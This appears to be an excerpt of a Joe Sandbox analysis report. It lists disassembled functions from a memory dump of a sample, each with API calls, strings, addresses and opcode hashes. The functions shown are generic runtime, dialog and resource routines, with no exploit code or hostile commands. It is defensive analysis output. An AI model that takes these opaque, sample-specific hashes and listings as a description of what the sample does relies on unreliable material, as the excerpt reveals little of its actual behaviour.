\\?\, xrefs: 000EBB52, 000EBB99, 000EBBF7, 000EBC4E
UNC, xrefs: 000EBBA7

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: e6c16dceba835bb12ac4fea04eb23004ddac20c20d10b55373512cc2016290d1
Instruction ID: 8b9b763baefd1ca7a273b47828494c3699239ea51aac35fd055c667f396956ed
Opcode Fuzzy Hash: e6c16dceba835bb12ac4fea04eb23004ddac20c20d10b55373512cc2016290d1
Instruction Fuzzy Hash: 8041B631404299AECF21AF62CC41EEF77B9AF45394F204566F954B3152EBB0EE90DA50

Uniqueness

Uniqueness Score: -1.00%

Function 000FB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 000FB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 000FB712
DeleteObject.GDI32(00000000), ref: 000FB744
DeleteObject.GDI32(00000000), ref: 000FB767

Part of subcall function 000FA6C2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,000FB73D,00000066), ref: 000FA6D5
Part of subcall function 000FA6C2: SizeofResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA6EC
Part of subcall function 000FA6C2: LoadResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA703
Part of subcall function 000FA6C2: LockResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA712
Part of subcall function 000FA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,000FB73D,00000066), ref: 000FA72D
Part of subcall function 000FA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,000FB73D,00000066), ref: 000FA73E
Part of subcall function 000FA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000FA7A7
Part of subcall function 000FA6C2: GlobalUnlock.KERNEL32(00000000), ref: 000FA7C6
Part of subcall function 000FA6C2: GlobalFree.KERNEL32(00000000), ref: 000FA7CD

Strings

], xrefs: 000FB71A

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: f5e4c9e51a51755ddb65d3273647b463b9cff31ff8e8ebad66d37e034ff6fe61
Instruction ID: c9ae8c8d6c96fb94348bb50ddfa2dc251e003fe4dd71a571c4b4f0c855c538ac
Opcode Fuzzy Hash: f5e4c9e51a51755ddb65d3273647b463b9cff31ff8e8ebad66d37e034ff6fe61
Instruction Fuzzy Hash: 15014976600319A7C712B774CC09ABF7AB99FC2B62F140011FB14E7AA2DF318D056A61

Uniqueness

Uniqueness Score: -1.00%

Function 000FD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370

EndDialog.USER32(?,00000001), ref: 000FD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 000FD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 000FD675
SetDlgItemTextW.USER32(?,00000068), ref: 000FD684

Strings

RENAMEDLG, xrefs: 000FD618

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: e843be0e68c33f557cce29436724289459df5cec9d2fc9cb4c8c038bc8c3f341
Instruction ID: 40db775f3cde794dcee30e595cc6828797fefd6f9f3c98cf88318340c2fd8307
Opcode Fuzzy Hash: e843be0e68c33f557cce29436724289459df5cec9d2fc9cb4c8c038bc8c3f341
Instruction Fuzzy Hash: 54012833685218BAD2208F649D09FBB779EEB9BB01F110116F305E28E0C7A29945B775

Uniqueness

Uniqueness Score: -1.00%

Function 00107E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00107E24,?,?,00107DC4,?,0011C300,0000000C,00107F1B,?,00000002), ref: 00107E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00107EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00107E24,?,?,00107DC4,?,0011C300,0000000C,00107F1B,?,00000002,00000000), ref: 00107EC9

Strings

CorExitProcess, xrefs: 00107E9E
mscoree.dll, xrefs: 00107E8C

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f3f5a2d19ea357f6db4e0f77f45e54853c2538f860884b5644dcb99fea111dab
Instruction ID: dfc07d9d2747c7f9b4554ff115fc9d56679dbda11875a68b212895b57915430c
Opcode Fuzzy Hash: f3f5a2d19ea357f6db4e0f77f45e54853c2538f860884b5644dcb99fea111dab
Instruction Fuzzy Hash: F6F06831A0521CBBDB199FA0DD09BEEBFB5EF44711F0080A9F815A2594DB759E81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00102BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00102CA1
___AdjustPointer.LIBCMT ref: 00102CC4
_abort.LIBCMT ref: 00102D12
___AdjustPointer.LIBCMT ref: 00102D60

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 326efd291d7dfedb633c1d6922063c89128e17e47a761cbfe39aa8ac1b43297b
Instruction ID: 0f428cf145d91883ecba720fc4efeb93cae69474f8adfa77c705b6922b2d9acc
Opcode Fuzzy Hash: 326efd291d7dfedb633c1d6922063c89128e17e47a761cbfe39aa8ac1b43297b
Instruction Fuzzy Hash: 1151E571600212AFEB298F54D989BBAB7A4FF64310F24452EEC85476E1E7F1ED80D790

Uniqueness

Uniqueness Score: -1.00%

Function 0010BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0010BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0010BF5C

Part of subcall function 00108E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0010BF82
_free.LIBCMT ref: 0010BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010BFA4

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ca079e28fab10c868b542a64f3071955c5cf5524851249579619a41656fcf438
Instruction ID: fe88545c895d61d7cdbcfa3d83d8c411669ece04314bd50200129865db0c68e2
Opcode Fuzzy Hash: ca079e28fab10c868b542a64f3071955c5cf5524851249579619a41656fcf438
Instruction Fuzzy Hash: 8D01F7726092167FA72516B65CCCCBB6A6DDFC2BA03154129F984C3285EFA0CD0285B0

Uniqueness

Uniqueness Score: -1.00%

Function 00109869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001091AD,0010B188,?,00109813,00000001,00000364,?,001040EF,?,?,00121098), ref: 0010986E
_free.LIBCMT ref: 001098A3
_free.LIBCMT ref: 001098CA
SetLastError.KERNEL32(00000000,?,00121098), ref: 001098D7
SetLastError.KERNEL32(00000000,?,00121098), ref: 001098E0

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a03a4855298f5b3d3950f9e3053f2f829227061c1e7acf1bd984517ce617751c
Instruction ID: 5b1b40aa856b0af0fc1a278f571b82c591ea1d5622deed73056727b490ebf1d6
Opcode Fuzzy Hash: a03a4855298f5b3d3950f9e3053f2f829227061c1e7acf1bd984517ce617751c
Instruction Fuzzy Hash: 280144321056096BD21A3374ADA595B26A9DFE27B07228236F9E5A23D3FFF08C014261

Uniqueness

Uniqueness Score: -1.00%

Function 000F0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 000F11CF: ResetEvent.KERNEL32(?), ref: 000F11E1
Part of subcall function 000F11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000F11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 000F0F21
CloseHandle.KERNEL32(?,?), ref: 000F0F3B
DeleteCriticalSection.KERNEL32(?), ref: 000F0F54
CloseHandle.KERNEL32(?), ref: 000F0F60
CloseHandle.KERNEL32(?), ref: 000F0F6C

Part of subcall function 000F0FE4: WaitForSingleObject.KERNEL32(?,000000FF,000F1101,?,?,000F117F,?,?,?,?,?,000F1169), ref: 000F0FEA
Part of subcall function 000F0FE4: GetLastError.KERNEL32(?,?,000F117F,?,?,?,?,?,000F1169), ref: 000F0FF6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 684bbf552699275223d1122174a2f09d391f75d2f7660186e5c7d6ccad955157
Instruction ID: 4fb273949dbba4a7c69fb4fce1589a393696f45210ea12fe9fac7cd54fb485d8
Opcode Fuzzy Hash: 684bbf552699275223d1122174a2f09d391f75d2f7660186e5c7d6ccad955157
Instruction Fuzzy Hash: 1601B571100744EFC7269B64DD84BC6FBE9FB08710F004929F26B92961C7717A84DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0010C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0010C817

Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4

_free.LIBCMT ref: 0010C829
_free.LIBCMT ref: 0010C83B
_free.LIBCMT ref: 0010C84D
_free.LIBCMT ref: 0010C85F

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 92501a5835f76e4840cf275d92b979c892bf7cf14460b67b1efc916bac95bb98
Instruction ID: 7ac0d6df02ca408190009e828812018871c9ea1ee81dbab48b347bc1b22f98bd
Opcode Fuzzy Hash: 92501a5835f76e4840cf275d92b979c892bf7cf14460b67b1efc916bac95bb98
Instruction Fuzzy Hash: E4F04F32515205ABC624DBE8E585C4A77E9AB54710754891AF5C8D79D2CBB0FC808B98

Uniqueness

Uniqueness Score: -1.00%

Function 000F1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000F1FE5
_wcslen.LIBCMT ref: 000F1FF6
_wcslen.LIBCMT ref: 000F2006
_wcslen.LIBCMT ref: 000F2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,000EB371,?,?,00000000,?,?,?), ref: 000F202F

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: ec4a1c0b03ae22f90ddad55226f316e3dbf784749fe7345f49dd13ce9423b6d2
Instruction ID: fa8aa6a14dfc0ca672052fbd49b97e77df421479b17711ff7f727a5dd0e95d3c
Opcode Fuzzy Hash: ec4a1c0b03ae22f90ddad55226f316e3dbf784749fe7345f49dd13ce9423b6d2
Instruction Fuzzy Hash: 07F06D33008018BBCF225F50EC09DCE3F2AEB54760B118105F62A5A0A2CBB296A1E690

Uniqueness

Uniqueness Score: -1.00%

Function 000FB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000FB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB58A
IsDialogMessageW.USER32(000204A2,?), ref: 000FB59E
TranslateMessage.USER32(?), ref: 000FB5AC
DispatchMessageW.USER32(?), ref: 000FB5B6

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: eb705b997728b59e7db6513b05f80e0d991e25ca168f98ba53eb34689a570e0f
Instruction ID: 38fc97c833946c7084c5c843d1e08c0ce2f44ed59b04700b6faa352cea25e443
Opcode Fuzzy Hash: eb705b997728b59e7db6513b05f80e0d991e25ca168f98ba53eb34689a570e0f
Instruction Fuzzy Hash: B1F0BD75A0111AAB8B20ABE5EC4CEEF7FACEF067917004515B519D3820EB38D646CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00108900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0010891E

Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4

_free.LIBCMT ref: 00108930
_free.LIBCMT ref: 00108943
_free.LIBCMT ref: 00108954
_free.LIBCMT ref: 00108965

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6f9eedac53249d998f73f79b40b2149ebf55e9eadeaa09db4562da46c473cb4d
Instruction ID: a12258e99d03441b1b62c62b2d249147937308ca2ab627d1f8c6e96eb0ba5728
Opcode Fuzzy Hash: 6f9eedac53249d998f73f79b40b2149ebf55e9eadeaa09db4562da46c473cb4d
Instruction Fuzzy Hash: 15F03A798255278BC60A6F94FD028453FA1F7267143810706F89852AF1DBF149C29B81

Uniqueness

Uniqueness Score: -1.00%

Function 000F15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 000F17BC
_swprintf.LIBCMT ref: 000F186B

Strings

%ls, xrefs: 000F1641, 000F1657
%s: %s, xrefs: 000F17CB

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: f82aeaebbb0a5fe8dc06ab8fded3597feda85be80254311dda2f8a8969a9e45d
Instruction ID: 4e039d7ee95fe79b197c262103ae568b127abb003e220e1f1c2f2d2bb0fb15d4
Opcode Fuzzy Hash: f82aeaebbb0a5fe8dc06ab8fded3597feda85be80254311dda2f8a8969a9e45d
Instruction Fuzzy Hash: 8F51ED3524C34CFAF63126908E46FFD76666B05B44F244506F39AB8CD2CDB3A451BB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00107F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe,00000104), ref: 00107FAE
_free.LIBCMT ref: 00108079
_free.LIBCMT ref: 00108083

Strings

C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe, xrefs: 00107FA5, 00107FAC, 00107FDB, 00108013

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe
API String ID: 2506810119-2207872565
Opcode ID: fe081a924816625d939cb1b6a7cd0e26ae53494c5878d4bfe11cfb495ee6458a
Instruction ID: 0298a2241dc1bd709d06071c626f68dbe6cc8ced8de0ff28c891df0e06b7ad52
Opcode Fuzzy Hash: fe081a924816625d939cb1b6a7cd0e26ae53494c5878d4bfe11cfb495ee6458a
Instruction Fuzzy Hash: 9231C271A08209AFCB21DF95DC8099EBBFCEF95310F11406AF88497295DBF09E85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001031D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001031FB
_abort.LIBCMT ref: 00103306

Strings

MOC, xrefs: 0010320D
RCC, xrefs: 00103215

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: ebb9b1326c3417b62d4c4ff17d5a82321f8589fe306817e7e8984f5dd36ad299
Instruction ID: e3f33122d1bbb95d478b42daec992b2c2a4f578e296cf7af8999161e0b2ce252
Opcode Fuzzy Hash: ebb9b1326c3417b62d4c4ff17d5a82321f8589fe306817e7e8984f5dd36ad299
Instruction Fuzzy Hash: 91416871900209AFCF16DF98CD81AEEBBB9BF08304F188059F954A7291D7B5AA50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 000E7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E7406

Part of subcall function 000E3BBA: __EH_prolog.LIBCMT ref: 000E3BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 000E74CD

Part of subcall function 000E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000E7AAB
